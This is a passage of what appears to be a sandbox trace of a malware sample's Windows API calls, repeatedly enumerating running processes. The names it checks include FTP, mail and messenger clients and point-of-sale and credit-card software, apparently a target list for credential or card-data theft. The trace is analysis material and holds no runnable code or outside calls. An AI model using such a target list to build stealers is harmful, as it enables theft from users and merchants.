cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0270.682] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0270.687] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0270.689] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0270.691] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0270.693] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0270.695] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0270.705] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0270.707] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0270.709] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0270.711] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0270.714] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0270.719] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0270.722] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0270.724] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0270.726] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0270.732] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0270.734] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0270.737] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0270.739] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0270.741] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0270.744] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0270.903] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0270.906] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0270.908] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0270.911] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0270.913] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0270.915] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0270.920] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0270.923] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0270.925] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0270.928] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0270.930] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0270.933] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0270.938] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0270.940] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0270.943] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0270.945] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0270.947] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0270.985] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0270.987] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0270.989] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0270.991] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0270.993] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0271.000] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0271.002] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0271.004] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0271.006] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0271.008] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0271.023] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0271.025] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0271.028] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0271.030] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0271.032] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0271.034] CloseHandle (hObject=0x1d14) returned 1 [0271.034] Sleep (dwMilliseconds=0x64) [0271.151] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0271.171] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.173] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0271.175] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0271.177] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.179] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0271.181] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.186] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0271.188] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0271.191] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0271.193] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.195] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.197] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0271.249] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.251] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.253] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.256] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.258] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.259] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.265] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.267] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0271.269] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0271.271] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0271.272] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.274] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0271.277] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0271.282] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0271.284] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0271.285] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0271.287] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.289] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, 